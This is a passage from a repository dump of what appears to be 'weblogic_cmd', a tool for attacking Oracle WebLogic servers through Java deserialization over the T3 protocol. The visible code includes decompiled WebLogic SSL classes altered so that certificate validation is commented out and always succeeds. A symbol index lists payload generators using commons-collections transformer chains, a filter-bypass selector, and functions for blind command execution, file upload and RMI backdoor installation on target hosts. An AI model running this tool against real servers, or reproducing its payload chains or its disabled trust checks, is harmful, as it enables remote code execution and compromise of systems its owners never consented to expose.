break;
case 11:
case 12:
case 13:
case 14:
case 15:
case 16:
case 17:
case 18:
case 19:
case 23:
case 24:
case 25:
case 26:
case 27:
case 28:
case 29:
case 31:
case 32:
case 33:
case 34:
case 35:
case 36:
case 37:
case 38:
case 39:
case 52:
case 53:
case 54:
case 55:
case 56:
case 57:
case 58:
case 59:
case 61:
case 62:
case 63:
case 64:
case 65:
case 66:
case 67:
case 68:
case 69:
case 72:
case 73:
case 74:
case 75:
case 76:
case 77:
case 78:
case 79:
case 81:
case 82:
case 83:
case 84:
case 85:
case 86:
case 87:
case 88:
case 89:
case 90:
case 91:
case 92:
case 93:
case 94:
case 95:
case 96:
case 97:
case 98:
case 99:
default:
var3 = SecurityLogger.logAlertReceivedFromPeerLoggable(var2, Integer.toString(var1));
break;
case 20:
var3 = SecurityLogger.logBadRecordMacAlertReceivedFromPeerLoggable(var2);
break;
case 21:
var3 = SecurityLogger.logDecryptionFailedAlertReceivedFromPeerLoggable(var2);
break;
case 22:
var3 = SecurityLogger.logRecordOverFlowAlertReceivedFromPeerLoggable(var2);
break;
case 30:
var3 = SecurityLogger.logDecompressionFailureAlertReceivedFromPeerLoggable(var2);
break;
case 40:
var3 = SecurityLogger.logHandshakeFailureAlertReceivedFromPeerLoggable(var2);
break;
case 41:
var3 = SecurityLogger.logNoCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 42:
var3 = SecurityLogger.logBadCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 43:
var3 = SecurityLogger.logUnsupportedCertificateAlertReceivedFromPeerLoggable(var2);
break;
case 44:
var3 = SecurityLogger.logCertificateRevokedAlertReceivedFromPeerLoggable(var2);
break;
case 45:
var3 = SecurityLogger.logCertificateExpiredAlertReceivedFromPeerLoggable(var2);
break;
case 46:
var3 = SecurityLogger.logCertificateUnknownAlertReceivedFromPeerLoggable(var2);
break;
case 47:
var3 = SecurityLogger.logIllegalParameterAlertReceivedFromPeerLoggable(var2);
break;
case 48:
var3 = SecurityLogger.logUnknownCAAlertReceivedFromPeerLoggable(var2);
break;
case 49:
var3 = SecurityLogger.logAccessDeniedAlertReceivedFromPeerLoggable(var2);
break;
case 50:
var3 = SecurityLogger.logDecodeErrorAlertReceivedFromPeerLoggable(var2);
break;
case 51:
var3 = SecurityLogger.logDecryptErrorAlertReceivedFromPeerLoggable(var2);
break;
case 60:
var3 = SecurityLogger.logExportRestrictionAlertReceivedFromPeerLoggable(var2);
break;
case 70:
var3 = SecurityLogger.logProtocolVersionAlertReceivedFromPeerLoggable(var2);
break;
case 71:
var3 = SecurityLogger.logInsufficientSecurityAlertReceivedFromPeerLoggable(var2);
break;
case 80:
var3 = SecurityLogger.logInternalErrorAlertReceivedFromPeerLoggable(var2);
break;
case 100:
var3 = SecurityLogger.logNoRenegotiationAlertReceivedFromPeerLoggable(var2);
}
var3.log();
setFailureDetails(var0.getSession(), var3.getMessage());
}
}
public static Properties getSSLTrustProperties(ServerMBean var0) {
Properties var1 = new Properties();
String var2 = var0.getKeyStores();
if("DemoIdentityAndDemoTrust".equals(var2)) {
add(var1, "TrustKeyStore", "DemoTrust");
add(var1, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
} else if("CustomIdentityAndJavaStandardTrust".equals(var2)) {
add(var1, "TrustKeyStore", "JavaStandardTrust");
add(var1, "JavaStandardTrustKeyStorePassPhrase", var0.getJavaStandardTrustKeyStorePassPhrase());
} else if("CustomIdentityAndCustomTrust".equals(var2)) {
add(var1, "TrustKeyStore", "CustomTrust");
add(var1, "CustomTrustKeyStoreFileName", var0.getCustomTrustKeyStoreFileName());
add(var1, "CustomTrustKeyStoreType", var0.getCustomTrustKeyStoreType());
add(var1, "CustomTrustKeyStorePassPhrase", var0.getCustomTrustKeyStorePassPhrase());
} else if(!"CustomIdentityAndCommandLineTrust".equals(var2)) {
throw new RuntimeException(SecurityLogger.getAssertionIllegalKeystoresValue(var2));
}
return var1;
}
static boolean isFatClient() {
return !Kernel.isServer();
}
public static void logSSLUsingNullCipher() {
SecurityLogger.logSSLUsingNullCipher();
}
private static void add(Properties var0, String var1, String var2) {
if(var2 != null) {
var0.setProperty(var1, var2);
}
}
}
================================================
FILE: src/weblogic/security/utils/SSLTrustValidator.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.security.utils;
import weblogic.kernel.Kernel;
import weblogic.logging.Loggable;
import weblogic.security.SSL.CertPathTrustManager;
import weblogic.security.SSL.TrustManager;
import weblogic.security.SecurityLogger;
import javax.net.ssl.SSLSocket;
import java.net.InetAddress;
import java.security.cert.X509Certificate;
public class SSLTrustValidator implements SSLTruster {
private boolean peerCertsRequired = false;
private boolean overrideAllowed = true;
private TrustManager trustManager = null;
private byte[][] rootCAFingerPrints = (byte[][]) null;
private String proxyHostName = null;
private String urlHostName = null;
public SSLTrustValidator() {
if (Kernel.isServer()) {
this.setTrustManager(new CertPathTrustManager());
}
}
public void setTrustManager(TrustManager var1) {
this.trustManager = var1;
}
public void setRootCAFingerPrints(byte[][] var1) {
this.rootCAFingerPrints = var1;
}
public boolean isPeerCertsRequired() {
return this.peerCertsRequired;
}
public void setPeerCertsRequired(boolean var1) {
this.peerCertsRequired = var1;
}
public void setAllowOverride(boolean var1) {
this.overrideAllowed = var1;
}
public void setProxyMapping(String var1, String var2) {
this.urlHostName = var2;
this.proxyHostName = var1;
}
public int validationCallback(X509Certificate[] var1, int var2, SSLSocket var3, X509Certificate[] var4) {
// boolean var5 = SSLSetup.isDebugEnabled();
// int var6 = var2;
// if(var5) {
// SSLSetup.info("validationCallback: validateErr = " + var2);
// if(var1 != null) {
// for(int var7 = 0; var7 < var1.length; ++var7) {
// SSLSetup.info(" cert[" + var7 + "] = " + var1[var7]);
// }
// }
// }
//
// if((var2 & 16) != 0 && this.rootCAFingerPrints != null && var1 != null && var1.length > 0) {
// try {
// byte[] var15 = SSLCertUtility.getFingerprint(var1[var1.length - 1]);
//
// for(int var8 = 0; var8 < this.rootCAFingerPrints.length; ++var8) {
// if(Arrays.equals(var15, this.rootCAFingerPrints[var8])) {
// var6 &= -21;
// if(var5) {
// SSLSetup.info("Untrusted cert now trusted by legacy check");
// }
// break;
// }
// }
// } catch (CertificateEncodingException var14) {
// SSLSetup.debug(1, var14, "Error while getting encoded certificate during trust validation");
// }
// }
//
// if(var1 == null || var1.length == 0) {
// if(this.peerCertsRequired) {
// if(var5) {
// SSLSetup.info("Required peer certificates not supplied by peer");
// }
//
// var6 |= 4;
// } else {
// if(var5) {
// SSLSetup.info("Peer certificates are not required and were not supplied by peer");
// }
//
// var6 = 0;
// }
// }
//
// if(this.trustManager != null) {
// TrustManagerEnvironment.push(var4, var3);
// boolean var16 = false;
//
// try {
// var16 = this.trustManager.certificateCallback(var1, var6);
// } finally {
// TrustManagerEnvironment.pop();
// }
//
// if(!var16 && var6 == 0) {
// var6 |= 32;
// }
//
// if(var5) {
// SSLSetup.info("weblogic user specified trustmanager validation status " + var6);
// }
// }
//
// if(var6 != 0) {
// this.logValidationError(var6, var3);
// if(!this.overrideAllowed) {
// if(var5) {
// SSLSetup.info("User defined JSSE trustmanagers not allowed to override");
// }
//
// var6 |= 64;
// }
// }
//
// if(var5) {
// SSLSetup.info("SSLTrustValidator returns: " + var6);
// }
return 0;
}
private String getTrustManagerClassName() {
return this.trustManager != null ? this.trustManager.getClass().getName() : null;
}
private String getPeerName(SSLSocket var1) {
String var2 = SSLSetup.getPeerName(var1);
if (this.proxyHostName != null && this.urlHostName != null) {
InetAddress var3 = var1.getInetAddress();
if (var3 != null && (this.proxyHostName.equals(var3.getHostName()) || this.proxyHostName.equals(var3.getHostAddress()))) {
var2 = var2 + " --> " + this.urlHostName;
}
}
return var2;
}
private void logValidationError(int var1, SSLSocket var2) {
if (SSLSetup.logSSLRejections()) {
String var3 = this.getPeerName(var2);
Loggable[] var4 = new Loggable[5];
int var5 = 0;
if ((var1 & 1) != 0) {
var4[var5++] = SecurityLogger.logHandshakeCertInvalidErrorLoggable(var3);
}
if ((var1 & 2) != 0) {
var4[var5++] = SecurityLogger.logHandshakeCertExpiredErrorLoggable(var3);
}
if ((var1 & 4) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertIncompleteErrorLoggable(var3) : SecurityLogger.logHandshakeCertIncompleteErrorLoggable(var3);
}
if ((var1 & 16) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertUntrustedErrorLoggable(var3) : SecurityLogger.logHandshakeCertUntrustedErrorLoggable(var3);
}
if ((var1 & 32) != 0) {
var4[var5++] = SSLSetup.isFatClient() ? SecurityLogger.logFatClientHandshakeCertValidationErrorLoggable(var3, this.getTrustManagerClassName()) : SecurityLogger.logHandshakeCertValidationErrorLoggable(var3, this.getTrustManagerClassName());
}
if (var5 > 0) {
StringBuffer var6 = null;
if (var2 != null) {
var6 = new StringBuffer();
}
for (int var7 = 0; var7 < var5; ++var7) {
var4[var7].log();
if (var2 != null) {
if (var7 > 0) {
var6.append(", ");
}
var6.append(var4[var7].getMessage());
}
}
if (var2 != null) {
SSLSetup.setFailureDetails(var2.getSession(), var6.toString());
}
}
}
if (SSLSetup.isDebugEnabled()) {
SSLSetup.info("Validation error = " + var1);
if ((var1 & 1) != 0) {
SSLSetup.info("Certificate chain is invalid");
}
if ((var1 & 2) != 0) {
SSLSetup.info("Expired certificate");
}
if ((var1 & 4) != 0) {
SSLSetup.info("Certificate chain is incomplete");
}
if ((var1 & 16) != 0) {
SSLSetup.info("Certificate chain is untrusted");
}
if ((var1 & 32) != 0) {
SSLSetup.info("Certificate chain was not validated by the custom trust manager even though built-in SSL validated it.");
}
}
}
}
================================================
FILE: src/weblogic/socket/ChannelSSLSocketFactory.java
================================================
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package weblogic.socket;
import java.io.IOException;
import java.net.InetAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.UnknownHostException;
import java.security.AccessController;
import java.security.SecureRandom;
import com.supeream.ssl.SocketFactory;
import com.supeream.ssl.TrustManagerImpl;
import weblogic.kernel.KernelStatus;
import weblogic.protocol.ServerChannel;
import weblogic.security.SSL.SSLClientInfo;
import weblogic.security.SSL.SSLSocketFactory;
import weblogic.security.acl.internal.AuthenticatedSubject;
import weblogic.security.acl.internal.Security;
import weblogic.security.service.PrivilegedActions;
import weblogic.security.service.SecurityServiceManager;
import weblogic.security.utils.SSLContextManager;
import weblogic.security.utils.SSLSetup;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
public final class ChannelSSLSocketFactory extends SSLSocketFactory {
private static final AuthenticatedSubject kernelId = (AuthenticatedSubject)AccessController.doPrivileged(PrivilegedActions.getKernelIdentityAction());
private ServerChannel channel;
private SSLClientInfo sslInfo;
public ChannelSSLSocketFactory(ServerChannel var1) {
super((javax.net.ssl.SSLSocketFactory)null);
if(var1 == null) {
throw new IllegalArgumentException("Channel must not be null");
} else {
this.channel = var1;
}
}
public Socket createSocket(String var1, int var2) throws IOException, UnknownHostException {
return this.createSocket(InetAddress.getByName(var1), var2);
}
public SSLSocketFactory initializeFromThread() throws IOException {
this.sslInfo = this.createSSLClientInfo();
return this;
}
public Socket createSocket(String var1, int var2, InetAddress var3, int var4) {
throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
}
public Socket createSocket(InetAddress var1, int var2) throws IOException {
javax.net.ssl.SSLSocketFactory var3 = this.getSocketFactory();
// javax.net.ssl.SSLSocketFactory var3 = this.g
return KernelStatus.isServer() && this.channel.isOutboundEnabled()?var3.createSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0):var3.createSocket(var1, var2);
}
public Socket createSocket(InetAddress var1, int var2, InetAddress var3, int var4) {
throw new UnsupportedOperationException("Binding characteristics are determined by the channel");
}
public Socket createSocket(InetAddress var1, int var2, int var3) throws IOException {
// try {
// SSLContext context = SSLContext.getInstance("SSL");
// // 初始化
// context.init(null,
// new TrustManager[]{new TrustManagerImpl()},
// new SecureRandom());
// javax.net.ssl.SSLSocketFactory factory = context.getSocketFactory();
// Socket socket = factory.createSocket(host, port);
// return socket;
// }catch (Exception e) {
// e.printStackTrace();
// }
// return null;
int var4 = var3 > 0?var3:this.channel.getConnectTimeout() * 1000;
if(var4 == 0) {
return this.createSocket(var1, var2);
} else {
Socket var5;
if(KernelStatus.isServer() && this.channel.isOutboundEnabled()) {
if(this.channel.getProxyAddress() != null) {
var5 = SocketMuxer.getMuxer().newProxySocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, InetAddress.getByName(this.channel.getProxyAddress()), this.channel.getProxyPort(), var4);
} else {
var5 = SocketMuxer.getMuxer().newSocket(var1, var2, InetAddress.getByName(this.channel.getAddress()), 0, var4);
}
} else {
var5 = SocketMuxer.getMuxer().newSocket(var1, var2, var4);
}
return this.createSocket(var5, var1.getHostName(), var2, true);
}
}
public String[] getDefaultCipherSuites() {
try {
return this.getSocketFactory().getDefaultCipherSuites();
} catch (IOException var2) {
throw (RuntimeException)(new IllegalStateException()).initCause(var2);
}
}
public String[] getSupportedCipherSuites() {
try {
return this.getSocketFactory().getSupportedCipherSuites();
} catch (IOException var2) {
throw (RuntimeException)(new IllegalStateException()).initCause(var2);
}
}
public Socket createSocket(Socket var1, String var2, int var3, boolean var4) throws IOException {
return this.getSocketFactory().createSocket(var1, var2, var3, var4);
}
private javax.net.ssl.SSLSocketFactory getSocketFactory() throws IOException {
if(this.sslInfo == null) {
this.sslInfo = this.createSSLClientInfo();
this.sslInfo.setNio(SocketMuxer.getMuxer().isAsyncMuxer());
}
return this.sslInfo.getSSLSocketFactory();
}
public SSLClientInfo getSSLClientInfo() {
return this.sslInfo;
}
private SSLClientInfo createSSLClientInfo() throws IOException {
SSLClientInfo var1 = Security.getThreadSSLClientInfo();
if((!KernelStatus.isServer() || var1 != null && !var1.isEmpty() || kernelId != SecurityServiceManager.getCurrentSubject(kernelId)) && (!this.channel.isOutboundEnabled() || !this.channel.isOutboundPrivateKeyEnabled())) {
return var1;
} else {
try {
return SSLContextManager.getChannelSSLClientInfo(this.channel, kernelId);
} catch (Exception var3) {
throw (IOException)(new IOException(var3.getMessage())).initCause(var3);
}
}
}
public void setSSLClientInfo(SSLClientInfo var1) {
try {
if(SocketMuxer.getMuxer().isAsyncMuxer()) {
if(var1 != null && !var1.isNioSet()) {
var1.setNio(true);
}
this.jsseFactory = var1 == null?SSLSetup.getSSLContext(var1).getSSLNioSocketFactory():var1.getSSLSocketFactory();
} else {
this.jsseFactory = var1 == null?SSLSetup.getSSLContext(var1).getSSLSocketFactory():var1.getSSLSocketFactory();
}
} catch (SocketException var3) {
SSLSetup.debug(3, var3, "Failed to create context");
throw new RuntimeException("Failed to update factory: " + var3.getMessage());
}
}
}
================================================
FILE: weblogic_cmd.iml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<module type="JAVA_MODULE" version="4">
<component name="NewModuleRootManager" inherit-compiler-output="true">
<exclude-output />
<content url="file://$MODULE_DIR$">
<sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
</content>
<orderEntry type="inheritedJdk" />
<orderEntry type="sourceFolder" forTests="false" />
<orderEntry type="library" name="commons-collections-3.1" level="project" />
<orderEntry type="library" name="wlfullclient" level="project" />
<orderEntry type="library" name="commons-cli-1.4" level="project" />
<orderEntry type="library" name="jsafeFIPS" level="project" />
<orderEntry type="library" name="wlcipher" level="project" />
</component>
</module>
gitextract_xf0mq9cb/ ├── .idea/ │ ├── artifacts/ │ │ └── weblogic_cmd_jar.xml │ ├── description.html │ ├── excludeFromValidation.xml │ ├── libraries/ │ │ ├── commons_cli_1_4.xml │ │ ├── commons_collections_3_1.xml │ │ ├── jsafeFIPS.xml │ │ ├── wlcipher.xml │ │ └── wlfullclient.xml │ ├── misc.xml │ ├── modules.xml │ ├── project-template.xml │ └── uiDesigner.xml ├── README.md ├── lib/ │ ├── commons-cli-1.4.jar │ ├── commons-collections-3.1.jar │ ├── jsafeFIPS.jar │ ├── wlcipher.jar │ └── wlfullclient.jar ├── src/ │ ├── META-INF/ │ │ └── MANIFEST.MF │ ├── com/ │ │ └── supeream/ │ │ ├── Main.java │ │ ├── payload/ │ │ │ ├── PayloadTest.java │ │ │ └── RemoteImpl.java │ │ ├── serial/ │ │ │ ├── BytesOperation.java │ │ │ ├── Reflections.java │ │ │ ├── SerialDataGenerator.java │ │ │ └── Serializables.java │ │ ├── ssl/ │ │ │ ├── SocketFactory.java │ │ │ ├── TrustManagerImpl.java │ │ │ └── WeblogicTrustManager.java │ │ └── weblogic/ │ │ ├── BypassPayloadSelector.java │ │ ├── ObjectTest.java │ │ ├── T3ProtocolOperation.java │ │ ├── T3Test.java │ │ └── WebLogicOperation.java │ └── weblogic/ │ ├── jms/ │ │ └── common/ │ │ └── StreamMessageImpl.java │ ├── security/ │ │ └── utils/ │ │ ├── SSLSetup.java │ │ └── SSLTrustValidator.java │ └── socket/ │ └── ChannelSSLSocketFactory.java └── weblogic_cmd.iml
SYMBOL INDEX (180 symbols across 19 files)
FILE: src/com/supeream/Main.java
class Main (line 20) | public class Main {
method getInitialContext (line 30) | public static Context getInitialContext(String url) throws NamingExcep...
method checkIsAlreadyInstalled (line 38) | public static boolean checkIsAlreadyInstalled(String host, String port) {
method executeBlind (line 58) | public static void executeBlind(String host, String port) throws Excep...
method converUrl (line 69) | public static String converUrl(String host, String port) {
method cdConcat (line 77) | private static String cdConcat(List<String> cds) {
method invokeRmi (line 86) | public static void invokeRmi(ClusterMasterRemote remoteCode) throws Ex...
method main (line 142) | public static void main(String[] args) {
FILE: src/com/supeream/payload/PayloadTest.java
class PayloadTest (line 9) | public class PayloadTest {
method main (line 10) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/payload/RemoteImpl.java
class RemoteImpl (line 21) | public class RemoteImpl implements ClusterMasterRemote {
method main (line 23) | public static void main(String[] args) {
method setServerLocation (line 44) | @Override
method uploadFile (line 49) | public static void uploadFile(String path, byte[] content) {
method getServerLocation (line 61) | @Override
FILE: src/com/supeream/serial/BytesOperation.java
class BytesOperation (line 10) | public class BytesOperation {
method hexStringToBytes (line 13) | public static byte[] hexStringToBytes(String hexString) {
method charToByte (line 31) | private static byte charToByte(char c) {
method byteMerger (line 35) | public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
method bytesToHexString (line 42) | public static String bytesToHexString(byte[] src) {
method GetByteByFile (line 58) | public static byte[] GetByteByFile(String FilePath) throws Exception {
method main (line 72) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/serial/Reflections.java
class Reflections (line 6) | public class Reflections {
method getField (line 8) | public static Field getField(final Class<?> clazz, final String fieldN...
method setFieldValue (line 17) | public static void setFieldValue(final Object obj, final String fieldN...
method getFieldValue (line 22) | public static Object getFieldValue(final Object obj, final String fiel...
method getFirstCtor (line 27) | public static Constructor<?> getFirstCtor(final String name) throws Ex...
FILE: src/com/supeream/serial/SerialDataGenerator.java
class SerialDataGenerator (line 20) | public class SerialDataGenerator {
method serialData (line 26) | private static byte[] serialData(Transformer[] transformers) throws Ex...
method defineAndLoadPayloadTransformerChain (line 49) | private static Transformer[] defineAndLoadPayloadTransformerChain(Stri...
method uploadTransformerChain (line 62) | private static Transformer[] uploadTransformerChain(String className, ...
method blindExecutePayloadTransformerChain (line 75) | private static Transformer[] blindExecutePayloadTransformerChain(Strin...
method serialRmiDatas (line 90) | public static byte[] serialRmiDatas(String[] bootArgs) throws Exception {
method serialBlindDatas (line 94) | public static byte[] serialBlindDatas(String[] execArgs) throws Except...
method serialUploadDatas (line 98) | public static byte[] serialUploadDatas(String filePath, byte[] content...
FILE: src/com/supeream/serial/Serializables.java
class Serializables (line 5) | public class Serializables {
method serialize (line 7) | public static byte[] serialize(final Object obj) throws IOException {
method serialize (line 13) | public static void serialize(final Object obj, final OutputStream out)...
method deserialize (line 20) | public static Object deserialize(final byte[] serialized) throws IOExc...
method deserialize (line 25) | public static Object deserialize(final InputStream in) throws ClassNot...
FILE: src/com/supeream/ssl/SocketFactory.java
class SocketFactory (line 14) | public class SocketFactory {
method SocketFactory (line 15) | private SocketFactory() {
method newSocket (line 18) | public static Socket newSocket(String host, int port) throws Exception {
FILE: src/com/supeream/ssl/TrustManagerImpl.java
class TrustManagerImpl (line 10) | public class TrustManagerImpl implements X509TrustManager {
method checkClientTrusted (line 12) | @Override
method checkServerTrusted (line 16) | @Override
method getAcceptedIssuers (line 21) | @Override
FILE: src/com/supeream/ssl/WeblogicTrustManager.java
class WeblogicTrustManager (line 10) | public class WeblogicTrustManager implements TrustManager {
method certificateCallback (line 11) | @Override
FILE: src/com/supeream/weblogic/BypassPayloadSelector.java
class BypassPayloadSelector (line 13) | public class BypassPayloadSelector {
method marshalledObject (line 15) | private static Object marshalledObject(Object payload) {
method streamMessageImpl (line 26) | public static Object streamMessageImpl(byte[] object) throws Exception {
method selectBypass (line 33) | public static Object selectBypass(Object payload) throws Exception {
FILE: src/com/supeream/weblogic/ObjectTest.java
class ObjectTest (line 10) | public class ObjectTest {
method main (line 11) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/weblogic/T3ProtocolOperation.java
class T3ProtocolOperation (line 22) | public class T3ProtocolOperation {
method send (line 25) | public static void send(String host, String port, byte[] payload) thro...
FILE: src/com/supeream/weblogic/T3Test.java
class T3Test (line 35) | public class T3Test {
method main (line 37) | public static void main(String[] args) throws Exception {
FILE: src/com/supeream/weblogic/WebLogicOperation.java
class WebLogicOperation (line 12) | public class WebLogicOperation {
method installRmi (line 14) | public static void installRmi(String host, String port) throws Excepti...
method unInstallRmi (line 19) | public static void unInstallRmi(String host, String port) throws Excep...
method blind (line 24) | public static void blind(String host, String port) throws Exception {
method uploadFile (line 29) | public static void uploadFile(String host, String port, String filePat...
method blindExecute (line 34) | public static void blindExecute(String host, String port, String cmd) ...
FILE: src/weblogic/jms/common/StreamMessageImpl.java
class StreamMessageImpl (line 17) | public final class StreamMessageImpl extends MessageImpl implements Stre...
method StreamMessageImpl (line 46) | public StreamMessageImpl() {
method StreamMessageImpl (line 49) | public StreamMessageImpl(StreamMessage var1) throws IOException, JMSEx...
method StreamMessageImpl (line 53) | public StreamMessageImpl(StreamMessage var1, Destination var2, Destina...
method getType (line 69) | public byte getType() {
method nullBody (line 73) | public void nullBody() {
method putTypeBack (line 83) | private void putTypeBack() {
method readPastEnd (line 90) | private String readPastEnd() {
method streamReadError (line 94) | private String streamReadError() {
method streamWriteError (line 98) | private String streamWriteError() {
method streamConversionError (line 102) | private String streamConversionError(String var1, String var2) {
method readType (line 106) | private byte readType() throws JMSException {
method writeType (line 122) | private void writeType(byte var1) throws JMSException {
method readBoolean (line 132) | public boolean readBoolean() throws JMSException {
method readByte (line 158) | public byte readByte() throws JMSException {
method readShort (line 189) | public short readShort() throws JMSException {
method readChar (line 227) | public char readChar() throws JMSException {
method readInt (line 253) | public int readInt() throws JMSException {
method readLong (line 292) | public long readLong() throws JMSException {
method readFloat (line 332) | public float readFloat() throws JMSException {
method readDouble (line 363) | public double readDouble() throws JMSException {
method readString (line 399) | public String readString() throws JMSException {
method readBytes (line 443) | public int readBytes(byte[] var1) throws JMSException {
method readObject (line 495) | public Object readObject() throws JMSException {
method writeBoolean (line 546) | public void writeBoolean(boolean var1) throws JMSException {
method writeByte (line 556) | public void writeByte(byte var1) throws JMSException {
method writeShort (line 566) | public void writeShort(short var1) throws JMSException {
method writeChar (line 576) | public void writeChar(char var1) throws JMSException {
method writeInt (line 586) | public void writeInt(int var1) throws JMSException {
method writeLong (line 596) | public void writeLong(long var1) throws JMSException {
method writeFloat (line 606) | public void writeFloat(float var1) throws JMSException {
method writeDouble (line 616) | public void writeDouble(double var1) throws JMSException {
method writeString (line 626) | public void writeString(String var1) throws JMSException {
method writeBytes (line 639) | public void writeBytes(byte[] var1) throws JMSException {
method writeBytes (line 643) | public void writeBytes(byte[] var1, int var2, int var3) throws JMSExce...
method writeObject (line 658) | public void writeObject(Object var1) throws JMSException {
method reset (line 691) | public void reset() throws JMSException {
method copy (line 704) | public MessageImpl copy() throws JMSException {
method checkWritable (line 721) | private void checkWritable() throws JMSException {
method checkReadable (line 732) | private void checkReadable() throws JMSException {
method toString (line 744) | public String toString() {
method writeExternal (line 748) | public void writeExternal(ObjectOutput paramObjectOutput) throws IOExc...
method decompressMessageBody (line 802) | public final void decompressMessageBody() throws JMSException {
method readExternal (line 816) | public void readExternal(ObjectInput var1) throws IOException, ClassNo...
method getPayloadSize (line 870) | public long getPayloadSize() {
method typeCodeToString (line 874) | private String typeCodeToString(int var1) {
method writeStringInternal (line 882) | private void writeStringInternal(String var1) throws IOException, JMSE...
method readStringInternal (line 893) | private String readStringInternal(byte var1) throws IOException {
method getDataBuffer (line 897) | public final byte[] getDataBuffer() {
method getDataSize (line 901) | public final int getDataSize() {
method setDataBuffer (line 905) | public final void setDataBuffer(byte[] var1, int var2) {
method getMessageBody (line 910) | public byte[] getMessageBody(int[] var1) throws JMSException {
FILE: src/weblogic/security/utils/SSLSetup.java
class SSLSetup (line 37) | public final class SSLSetup extends SSLSetupLogging {
method SSLSetup (line 58) | public SSLSetup() {
method getLicenseLevel (line 61) | public static synchronized int getLicenseLevel() {
method initForServer (line 73) | public static synchronized void initForServer() {
method setSSLDelegate (line 78) | private static void setSSLDelegate(String var0) {
method getSSLDelegateInstance (line 91) | static SSLContextDelegate getSSLDelegateInstance() {
method getIOModel (line 110) | public static int getIOModel() {
method logSSLRejections (line 115) | public static boolean logSSLRejections() {
method setIOModel (line 130) | public static void setIOModel(int var0) {
method getProtocolVersion (line 140) | public static int getProtocolVersion() {
method getEnforceConstraints (line 163) | public static int getEnforceConstraints() {
method getSSLContext (line 190) | public static SSLContextWrapper getSSLContext() throws SocketException {
method getSSLContext (line 194) | public static SSLContextWrapper getSSLContext(SSLClientInfo var0) thro...
method applyInfo (line 214) | private static void applyInfo(SSLContextWrapper var0, SSLClientInfo va...
method getTrustedCAs (line 278) | private static X509Certificate[] getTrustedCAs(SSLContextWrapper var0) {
method setFailureDetails (line 322) | public static void setFailureDetails(SSLSession var0, String var1) {
method getFailureDetails (line 326) | public static String getFailureDetails(SSLSession var0) {
method logPlaintextProtocolClientError (line 330) | public static void logPlaintextProtocolClientError(SSLSocket var0, Str...
method logProtocolVersionError (line 341) | public static void logProtocolVersionError(SSLSocket var0) {
method logCertificateChainConstraintsStrictNonCriticalFailure (line 352) | public static void logCertificateChainConstraintsStrictNonCriticalFail...
method logCertificateChainMissingConstraintsFailure (line 363) | public static void logCertificateChainMissingConstraintsFailure(SSLSoc...
method logCertificateChainNotACaConstraintsFailure (line 374) | public static void logCertificateChainNotACaConstraintsFailure(SSLSock...
method logCertificateChainPathLenExceededConstraintsFailure (line 385) | public static void logCertificateChainPathLenExceededConstraintsFailur...
method logCertificateChainConstraintsConversionFailure (line 396) | public static void logCertificateChainConstraintsConversionFailure(SSL...
method logCertificateChainUnrecognizedExtensionFailure (line 407) | public static void logCertificateChainUnrecognizedExtensionFailure(SSL...
method logCertificateChainAlgKeyUsageFailure (line 418) | public static void logCertificateChainAlgKeyUsageFailure(SSLSocket var...
method logCertificateChainCheckKeyUsageFailure (line 429) | public static void logCertificateChainCheckKeyUsageFailure(SSLSocket v...
method logCertificateChainCertSignKeyUsageFailure (line 440) | public static void logCertificateChainCertSignKeyUsageFailure(SSLSocke...
method logCertificatePolicyIdDoesntExistIntheList (line 451) | public static void logCertificatePolicyIdDoesntExistIntheList(SSLSocke...
method logPolicyQualifierIdNotCPS (line 462) | public static void logPolicyQualifierIdNotCPS(SSLSocket var0, String v...
method getPeerName (line 473) | public static String getPeerName(SSLSocket var0) {
method logAlertReceivedFromPeer (line 493) | public static void logAlertReceivedFromPeer(SSLSocket var0, int var1) {
method getSSLTrustProperties (line 642) | public static Properties getSSLTrustProperties(ServerMBean var0) {
method isFatClient (line 663) | static boolean isFatClient() {
method logSSLUsingNullCipher (line 667) | public static void logSSLUsingNullCipher() {
method add (line 671) | private static void add(Properties var0, String var1, String var2) {
FILE: src/weblogic/security/utils/SSLTrustValidator.java
class SSLTrustValidator (line 18) | public class SSLTrustValidator implements SSLTruster {
method SSLTrustValidator (line 26) | public SSLTrustValidator() {
method setTrustManager (line 33) | public void setTrustManager(TrustManager var1) {
method setRootCAFingerPrints (line 37) | public void setRootCAFingerPrints(byte[][] var1) {
method isPeerCertsRequired (line 41) | public boolean isPeerCertsRequired() {
method setPeerCertsRequired (line 45) | public void setPeerCertsRequired(boolean var1) {
method setAllowOverride (line 49) | public void setAllowOverride(boolean var1) {
method setProxyMapping (line 53) | public void setProxyMapping(String var1, String var2) {
method validationCallback (line 58) | public int validationCallback(X509Certificate[] var1, int var2, SSLSoc...
method getTrustManagerClassName (line 141) | private String getTrustManagerClassName() {
method getPeerName (line 145) | private String getPeerName(SSLSocket var1) {
method logValidationError (line 157) | private void logValidationError(int var1, SSLSocket var2) {
FILE: src/weblogic/socket/ChannelSSLSocketFactory.java
class ChannelSSLSocketFactory (line 32) | public final class ChannelSSLSocketFactory extends SSLSocketFactory {
method ChannelSSLSocketFactory (line 37) | public ChannelSSLSocketFactory(ServerChannel var1) {
method createSocket (line 46) | public Socket createSocket(String var1, int var2) throws IOException, ...
method initializeFromThread (line 50) | public SSLSocketFactory initializeFromThread() throws IOException {
method createSocket (line 55) | public Socket createSocket(String var1, int var2, InetAddress var3, in...
method createSocket (line 59) | public Socket createSocket(InetAddress var1, int var2) throws IOExcept...
method createSocket (line 65) | public Socket createSocket(InetAddress var1, int var2, InetAddress var...
